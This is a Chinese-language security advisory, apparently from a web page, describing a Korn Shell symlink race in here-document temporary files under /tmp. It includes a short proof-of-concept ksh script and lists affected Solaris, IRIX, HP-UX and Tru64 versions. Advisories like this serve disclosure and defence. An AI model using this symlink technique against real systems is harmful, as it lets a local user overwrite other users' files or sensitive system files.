涉及程序:
Korn Shell
描述:
Korn Shell 输入重定向条件竞争漏洞
详细:
Korn Shell 是伴随 UNIX 操作系统发行的一种被广泛使用的 shell 脚本。发现它存在一个安全漏洞,允许本地用户非法修改其他用户的文件。
问题产生是因为使用输入、输出重定向操作符 << 。如果使用输入、输出重定向操作符 << ,脚本和命令行可以在 /tmp 目录下创建一个不安全的文件。特别是创建一个tmp.<pid> 为文件名的文件,pid 为 shell 的进程号。这样恶意用户可以利用文件名创建一个链接到该文件,附带 << 重定向请求在文件中加入指定的内容。
利用该漏洞恶意的用户能破坏其它用户的文件,或对敏感的系统文件的内容的修改。
以下代码仅仅用来测试和研究这个漏洞,如果您将其用于不正当的途径请后果自负
#!/bin/ksh -x
touch /tmp/silly.1
ln -s /tmp/silly.1 /tmp/sh$$.1
ls -l /tmp/silly.* /tmp/sh$$.*
cat <<EOF
Just some short text
EOF
ls -l /tmp/silly.* /tmp/sh$$.*
rm /tmp/silly.* /tmp/sh$$.*
受影响的系统:
Digital (Compaq) TRU64/DIGITAL UNIX 5.0
网管网www.bitscn.com
HP HP-UX 9.0
SGI IRIX 6.5.7
SGI IRIX 6.5.5
SGI IRIX 6.2
Sun Solaris 7.0
Sun Solaris 2.6
Sun Solaris 2.5.1
不受影响系统:
HP HP-UX 11.0
Sun Solaris 8.0
解决方案:
CNNS为您提供完善的网络安全服务。
评论加载中…
